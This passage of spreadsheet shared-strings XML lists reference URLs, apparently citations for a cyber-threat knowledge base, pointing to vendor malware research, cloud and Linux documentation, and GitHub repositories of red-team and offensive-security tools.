    <t>https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider</t>
  </si>
  <si>
    <t>https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-1.html</t>
  </si>
  <si>
    <t>https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware</t>
  </si>
  <si>
    <t>https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions</t>
  </si>
  <si>
    <t>https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html</t>
  </si>
  <si>
    <t>https://www.fortinet.com/blog/threat-research/trickbot-s-new-reconnaissance-plugin.html</t>
  </si>
  <si>
    <t>http://fortune.com/2017/09/06/hack-energy-grid-symantec/</t>
  </si>
  <si>
    <t>https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/</t>
  </si>
  <si>
    <t>https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf</t>
  </si>
  <si>
    <t>https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html</t>
  </si>
  <si>
    <t>https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html</t>
  </si>
  <si>
    <t>https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html</t>
  </si>
  <si>
    <t>https://www.freedesktop.org/wiki/Software/systemd/</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=fXthwl6ShOg</t>
  </si>
  <si>
    <t>https://vms.drweb.com/virus/?i=4276269</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/</t>
  </si>
  <si>
    <t>https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data</t>
  </si>
  <si>
    <t>https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/</t>
  </si>
  <si>
    <t>https://cloud.google.com/compute/docs/instances/create-start-instance#api_2</t>
  </si>
  <si>
    <t>https://support.google.com/cloudidentity/answer/7332836?hl=en&amp;ref_topic=7558554</t>
  </si>
  <si>
    <t>https://cloud.google.com/iam/docs/service-account-monitoring</t>
  </si>
  <si>
    <t>https://cloud.google.com/vpc/docs/packet-mirroring</t>
  </si>
  <si>
    <t>https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add</t>
  </si>
  <si>
    <t>https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/</t>
  </si>
  <si>
    <t>https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence</t>
  </si>
  <si>
    <t>https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf</t>
  </si>
  <si>
    <t>https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html</t>
  </si>
  <si>
    <t>https://www.gnu.org/software/libc/</t>
  </si>
  <si>
    <t>http://www.gmer.net/</t>
  </si>
  <si>
    <t>https://www.gnu.org/software/acct/</t>
  </si>
  <si>
    <t>https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf</t>
  </si>
  <si>
    <t>https://gtfobins.github.io/gtfobins/split/</t>
  </si>
  <si>
    <t>https://gtfobins.github.io/#+suid</t>
  </si>
  <si>
    <t>https://gtfobins.github.io/gtfobins/at/</t>
  </si>
  <si>
    <t>https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191</t>
  </si>
  <si>
    <t>http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/</t>
  </si>
  <si>
    <t>http://www.symantec.com/connect/blogs/bios-threat-showing-again</t>
  </si>
  <si>
    <t>https://geminiadvisory.io/fin7-ransomware-bastion-secure/</t>
  </si>
  <si>
    <t>http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos</t>
  </si>
  <si>
    <t>https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant</t>
  </si>
  <si>
    <t>https://vblocalhost.com/uploads/VB2021-Slowik.pdf</t>
  </si>
  <si>
    <t>https://github.com/dstepanic/attck_empire</t>
  </si>
  <si>
    <t>https://github.com/damianh/aws-adfs-credential-generator</t>
  </si>
  <si>
    <t>https://github.com/BloodHoundAD/BloodHound</t>
  </si>
  <si>
    <t>https://github.com/TheWover/CertStealer</t>
  </si>
  <si>
    <t>https://github.com/GhostPack/Certify/</t>
  </si>
  <si>
    <t>https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/</t>
  </si>
  <si>
    <t>https://github.com/Kevin-Robertson/Conveigh</t>
  </si>
  <si>
    <t>https://github.com/Neohapsis/creddump7</t>
  </si>
  <si>
    <t>https://github.com/shellster/DCSYNCMonitor</t>
  </si>
  <si>
    <t>https://github.com/m0nad/Diamorphine</t>
  </si>
  <si>
    <t>https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b</t>
  </si>
  <si>
    <t>https://github.com/GhostPack/SharpDPAPI#certificates</t>
  </si>
  <si>
    <t>https://github.com/michenriksen/gitrob</t>
  </si>
  <si>
    <t>https://github.com/hob0/hashjacking</t>
  </si>
  <si>
    <t>https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml</t>
  </si>
  <si>
    <t>https://github.com/Kevin-Robertson/Inveigh</t>
  </si>
  <si>
    <t>https://github.com/danielbohannon/Invoke-Obfuscation</t>
  </si>
  <si>
    <t>https://github.com/peewpw/Invoke-PSImage</t>
  </si>
  <si>
    <t>https://github.com/AlessandroZ/LaZagne</t>
  </si>
  <si>
    <t>https://github.com/dafthack/MailSniper</t>
  </si>
  <si>
    <t>https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile</t>
  </si>
  <si>
    <t>https://github.com/muraenateam/muraena</t>
  </si>
  <si>
    <t>https://github.com/gentilkiwi/mimikatz/issues/92</t>
  </si>
  <si>
    <t>https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos</t>
  </si>
  <si>
    <t>https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump</t>
  </si>
  <si>
    <t>https://github.com/putterpanda/mimikittenz</t>
  </si>
  <si>
    <t>https://github.com/nomex/nbnspoof</t>
  </si>
  <si>
    <t>https://github.com/gremwell/o365enum</t>
  </si>
  <si>
    <t>https://github.com/itsreallynick/office-crackros</t>
  </si>
  <si>
    <t>https://github.com/OmerYa/Invisi-Shell</t>
  </si>
  <si>
    <t>https://github.com/GhostPack/PSPKIAudit</t>
  </si>
  <si>
    <t>https://github.com/RhinoSecurityLabs/pacu</t>
  </si>
  <si>
    <t>https://github.com/LiveMirror/pcshare</t>
  </si>
  <si>
    <t>https://github.com/ryhanson/phishery</t>
  </si>
  <si>
    <t>https://github.com/nettitude/PoshC2_Python</t>
  </si>
  <si>
    <t>https://github.com/PowerShellMafia/PowerSploit</t>
  </si>
  <si>
    <t>https://github.com/n1nj4sec/pupy</t>
  </si>
  <si>
    <t>https://github.com/quasar/QuasarRAT</t>
  </si>
  <si>
    <t>https://github.com/True-Demon/raindance</t>
  </si>
  <si>
    <t>https://github.com/f0rb1dd3n/Reptile</t>
  </si>
  <si>
    <t>https://github.com/SpiderLabs/Responder</t>
  </si>
  <si>
    <t>https://github.com/danielbohannon/Revoke-Obfuscation</t>
  </si>
  <si>
    <t>https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard</t>
  </si>
  <si>
    <t>https://github.com/byt3bl33d3r/SILENTTRINITY</t>
  </si>
  <si>
    <t>https://github.com/byt3bl33d3r/SILENTTRINITY/tree/master/silenttrinity/core/teamserver/modules/boo</t>
  </si>
  <si>
    <t>https://github.com/mattifestation/PoCSubjectInterfacePackage</t>
  </si>
  <si>
    <t>https://github.com/BishopFox/sliver/</t>
  </si>
  <si>
    <t>https://github.com/BishopFox/sliver/wiki/DNS-C2</t>
  </si>
  <si>
    <t>https://github.com/BishopFox/sliver/blob/7489c69962b52b09ed377d73d142266564845297/client/command/filesystem/download.go</t>
  </si>
  <si>
    <t>https://github.com/BishopFox/sliver/wiki/Transport-Encryption</t>
  </si>
  <si>
    <t>https://github.com/BishopFox/sliver/tree/master/client/command/filesystem</t>
  </si>
  <si>
    <t>https://github.com/BishopFox/sliver/wiki/HTTP(S)-C2</t>
  </si>
  <si>
    <t>https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/command/network/ifconfig.go</t>
  </si>
  <si>
    <t>https://github.com/BishopFox/sliver/tree/58a56a077f0813bb312f9fa4df7453b510c3a73b/implant/sliver/netstat</t>
  </si>
  <si>
    <t>https://github.com/BishopFox/sliver/blob/master/implant/sliver/screen/screenshot_windows.go</t>
  </si>
  <si>
    <t>https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/command/filesystem/upload.go</t>
  </si>
  <si>
    <t>https://github.com/hfiref0x/TDL</t>
  </si>
  <si>
    <t>https://github.com/api0cradle/UltimateAppLockerByPassList</t>
  </si>
  <si>
    <t>https://github.com/dxa4481/truffleHog</t>
  </si>
  <si>
    <t>https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN</t>
  </si>
  <si>
    <t>https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs</t>
  </si>
  <si>
    <t>https://github.com/chipsec/chipsec</t>
  </si>
  <si>
    <t>https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py</t>
  </si>
  <si>
    <t>https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py</t>
  </si>
  <si>
    <t>https://github.com/GhostPack/KeeThief</t>
  </si>
  <si>
    <t>https://github.com/zerosum0x0/koadic</t>
  </si>
  <si>
    <t>https://github.com/DiabloHorn/mempdump</t>
  </si>
  <si>
    <t>https://github.com/outflankbv/NetshHelperBeacon</t>
  </si>
  <si>
    <t>https://github.com/gtworek/PSBits/tree/master/NoRunDll</t>
  </si>
  <si>
    <t>https://github.com/jaredhaight/PSAttack</t>
  </si>
  <si>
    <t>https://github.com/PowerShellEmpire/Empire</t>
  </si>
  <si>
    <t>https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1</t>
  </si>
  <si>
    <t>https://github.com/rapid7/meterpreter/tree/master/source/extensions/priv/server/elevate</t>
  </si>
  <si>
    <t>https://github.com/hfiref0x/UACME</t>
  </si>
  <si>
    <t>https://github.com/scottlundgren/w32time</t>
  </si>
  <si>
    <t>https://github.com/kgretzky/evilginx2</t>
  </si>
  <si>
    <t>https://www.glitch-cat.com/blog/green-lambert-and-attack</t>
  </si>
  <si>
    <t>https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique</t>
  </si>
  <si>
    <t>https://support.google.com/a/answer/7223765?hl=en</t>
  </si>
  <si>
    <t>https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207</t>
  </si>
  <si>
    <t>https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/</t>
  </si>
  <si>
    <t>https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots</t>
  </si>
  <si>
    <t>https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list</t>
  </si>
  <si>
    <t>https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata</t>
  </si>
  <si>
    <t>https://cloud.google.com/kms/docs/key-rotation</t>
  </si>
  <si>
    <t>https://cloud.google.com/iam/docs/policies</t>
  </si>
  <si>
    <t>https://cloud.google.com/identity/docs/reference/rest</t>
  </si>
  <si>
    <t>https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/</t>
  </si>
  <si>
    <t>https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials</t>
  </si>
  <si>
    <t>https://cloud.google.com/storage</t>
  </si>
  <si>
    <t>https://cloud.google.com/storage/docs/best-practices</t>
  </si>
  <si>
    <t>https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard</t>
  </si>
  <si>
    <t>https://cloud.google.com/sdk/gcloud/reference/compute/instances/list</t>
  </si>
  <si>
    <t>https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/</t>
  </si>
  <si>
    <t>https://blog.google/threat-analysis-group/how-were-tackling-evolving-online-threats/</t>
  </si>
  <si>
    <t>https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html</t>
  </si>
  <si>
    <t>https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction</t>
  </si>
  <si>
    <t>https://cloud.google.com/compute/docs/reference/rest/v1/instances</t>
  </si>
  <si>
    <t>https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/</t>
  </si>
  <si>
    <t>https://blog.google/threat-analysis-group/update-threat-landscape-ukraine</t>
  </si>
  <si>
    <t>https://cloud.google.com/compute/docs/instances</t>
  </si>
  <si>
    <t>https://cloud.google.com/vpc/docs/vpc</t>
  </si>
  <si>
    <t>https://support.google.com/a/answer/166870?hl=en</t>
  </si>
  <si>
    <t>https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf</t>
  </si>
  <si>
    <t>http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html</t>
  </si>
  <si>
    <t>https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/</t>
  </si>
  <si>
    <t>https://blog.group-ib.com/colunmtk_apt41</t>
  </si>
  <si>
    <t>https://www.group-ib.com/blog/cobalt</t>
  </si>
  <si>
    <t>https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer</t>
  </si>
  <si>
    <t>https://www.group-ib.com/blog/rtm</t>
  </si>
  <si>
    <t>https://www.group-ib.com/whitepapers/ransomware-uncovered.html</t>
  </si>
  <si>
    <t>https://groupib.pathfactory.com/ransomware-reports/prolock_wp</t>
  </si>
  <si>
    <t>https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf</t>
  </si>
  <si>
    <t>https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf</t>
  </si>
  <si>
    <t>http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf</t>
  </si>
  <si>
    <t>https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/</t>
  </si>
  <si>
    <t>https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/</t>
  </si>
  <si>
    <t>https://www.menlosecurity.com/blog/new-attack-alert-duri</t>
  </si>
  <si>
    <t>https://thehackernews.com/2018/06/chinese-watering-hole-attack.html</t>
  </si>
  <si>
    <t>https://thehackernews.com/2022/04/into-breach-breaking-down-3-saas-app.html</t>
  </si>
  <si>
    <t>https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html</t>
  </si>
  <si>
    <t>https://www.hackers-arise.com/email-scraping-and-maltego</t>
  </si>
  <si>
    <t>http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html</t>
  </si>
  <si>
    <t>http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/</t>
  </si>
  <si>
    <t>http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/</t>
  </si>
  <si>
    <t>https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944</t>
  </si>
  <si>
    <t>https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/</t>
  </si>
  <si>
    <t>http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/</t>
  </si>
  <si>
    <t>http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/</t>
  </si>
  <si>
    <t>https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631</t>
  </si>
  <si>
    <t>http://lists.openstack.org/pipermail/openstack/2013-December/004138.html</t>
  </si>
  <si>
    <t>https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464</t>
  </si>
  <si>
    <t>http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/</t>
  </si>
  <si>
    <t>http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/</t>
  </si>
  <si>
    <t>http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/</t>
  </si>
  <si>
    <t>https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/</t>
  </si>
  <si>
    <t>https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/</t>
  </si>
  <si>
    <t>https://www.exploit-db.com/docs/17802.pdf</t>
  </si>
  <si>
    <t>https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc</t>
  </si>
  <si>
    <t>https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/</t>
  </si>
  <si>
    <t>https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/</t>
  </si>
  <si>
    <t>https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection</t>
  </si>
  <si>
    <t>https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100</t>
  </si>
  <si>
    <t>https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110</t>
  </si>
  <si>
    <t>https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/</t>
  </si>
  <si>
    <t>https://securityintelligence.com/posts/observations-of-itg07-cyber-operations/</t>
  </si>
  <si>
    <t>https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/</t>
  </si>
  <si>
    <t>https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/</t>
  </si>
  <si>
    <t>https://securityintelligence.com/posts/from-mega-to-giga-cross-version-comparison-of-top-megacortex-modifications/</t>
  </si>
  <si>
    <t>https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/</t>
  </si>
  <si>
    <t>https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&amp;myns=s028&amp;mynp=OCSTHGUJ&amp;mynp=OCSTLM5A&amp;mynp=OCSTLM6B&amp;mynp=OCHW206&amp;mync=E&amp;cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E</t>
  </si>
  <si>
    <t>https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/</t>
  </si>
  <si>
    <t>https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/</t>
  </si>
  <si>
    <t>https://www.icann.org/groups/ssac/documents/sac-007-en</t>
  </si>
  <si>
    <t>https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html</t>
  </si>
  <si>
    <t>https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware</t>
  </si>
  <si>
    <t>https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes</t>
  </si>
  <si>
    <t>https://itsyndicate.org/blog/disabling-dangerous-php-functions/</t>
  </si>
  <si>
    <t>https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/</t>
  </si>
  <si>
    <t>https://www.secureauth.com/labs/open-source-tools/impacket</t>
  </si>
  <si>
    <t>https://www.imperva.com/learn/ddos/booters-stressers-ddosers/</t>
  </si>
  <si>
    <t>https://linux-audit.com/increase-kernel-integrity-with-disabled-linux-kernel-modules-loading/</t>
  </si>
  <si>
    <t>https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/</t>
  </si>
  <si>
    <t>https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22</t>
  </si>
  <si>
    <t>https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/</t>
  </si>
  <si>
    <t>https://man7.org/linux/man-pages/man2/init_module.2.html</t>
  </si>
  <si>
    <t>https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM</t>
  </si>
  <si>
    <t>https://blog.stealthbits.com/attack-step-3-persistence-ntfs-extended-attributes-file-system-attacks</t>
  </si>
  <si>
    <t>https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf</t>
  </si>
  <si>
    <t>https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/</t>
  </si>
  <si>
    <t>https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/</t>
  </si>
  <si>
    <t>https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/</t>
  </si>
  <si>
    <t>http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html</t>
  </si>
  <si>
    <t>https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf</t>
  </si>
  <si>
    <t>https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/</t>
  </si>
  <si>
    <t>https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/</t>
  </si>
  <si>
    <t>http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/</t>
  </si>
  <si>
    <t>https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/</t>
  </si>
  <si>
    <t>https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/</t>
  </si>
  <si>
    <t>https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/</t>
  </si>
  <si>
    <t>https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf</t>
  </si>
  <si>
    <t>https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/</t>
  </si>
  <si>
    <t>https://www.intrinsec.com/egregor-prolock/?cn-reloaded=1</t>
  </si>
  <si>
    <t>https://thewover.github.io/Introducing-Donut/</t>
  </si>
  <si>
    <t>https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/</t>
  </si>
  <si>
    <t>https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/</t>
  </si>
  <si>
    <t>https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape</t>
  </si>
  <si>
    <t>https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims</t>
  </si>
  <si>
    <t>http://www.issuemakerslab.com/research3/</t>
  </si>
  <si>
    <t>http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html</t>
  </si>
  <si>
    <t>https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html</t>
  </si>
  <si>
    <t>https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/win32/com/translating-to-jscript</t>
  </si>
  <si>
    <t>https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2</t>
  </si>
  <si>
    <t>https://twitter.com/james_inthe_box/status/1150495335812177920</t>
  </si>
  <si>
    <t>https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines</t>
  </si>
  <si>
    <t>http://www.thesafemac.com/new-signed-malware-called-janicab/</t>
  </si>
  <si>
    <t>https://github.com/jay/gethooks</t>
  </si>
  <si>
    <t>https://www.joesecurity.org/blog/3660886847485093803</t>
  </si>
  <si>
    <t>https://www.joesecurity.org/blog/498839998833561473</t>
  </si>
  <si>
    <t>https://www.joesandbox.com/analysis/318027/0/html</t>
  </si>
  <si>
    <t>http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html</t>
  </si>
  <si>
    <t>https://www.juniper.net/documentation/en_US/junos/topics/task/configuration/understanding-and-using-dai.html</t>
  </si>
  <si>
    <t>https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware</t>
  </si>
  <si>
    <t>https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf</t>
  </si>
  <si>
    <t>https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html</t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/reference/access-authn-authz/authorization/</t>
  </si>
  <si>
    <t>https://www.boho.or.kr/krcert/publicationView.do?bulletin_writing_sequence=35936</t>
  </si>
  <si>
    <t>https://tools.kali.org/password-attacks/hydra</t>
  </si>
  <si>
    <t>https://github.com/nccgroup/redsnarf</t>
  </si>
  <si>
    <t>https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html</t>
  </si>
  <si>
    <t>https://skanthak.homepage.t-online.de/sentinel.html</t>
  </si>
  <si>
    <t>https://securelist.com/apt-trends-report-q1-2020/96826/</t>
  </si>
  <si>
    <t>https://securelist.com/apt-trends-report-q1-2021/101967</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/</t>
  </si>
  <si>
    <t>https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf</t>
  </si>
  <si>
    <t>https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/recent-cloud-atlas-activity/92016/</t>
  </si>
  <si>
    <t>https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/dridex-a-history-of-evolution/78531/</t>
  </si>
  <si>
    <t>https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers</t>
  </si>
  <si>
    <t>https://securelist.com/files/2015/06/The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/</t>
  </si>
  <si>
    <t>https://securelist.com/the-flame-questions-and-answers-51/34344/</t>
  </si>
  <si>
    <t>https://securelist.com/flame-bunny-frog-munch-and-beetlejuice-2/32855/</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/</t>
  </si>
  <si>
    <t>https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging</t>
  </si>
  <si>
    <t>https://securelist.com/unraveling-the-lamberts-toolkit/77990/</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/lazarus-under-the-hood/77908/</t>
  </si>
  <si>
    <t>https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/malicious-tasks-in-ms-sql-server/92167/</t>
  </si>
  <si>
    <t>https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/</t>
  </si>
  <si>
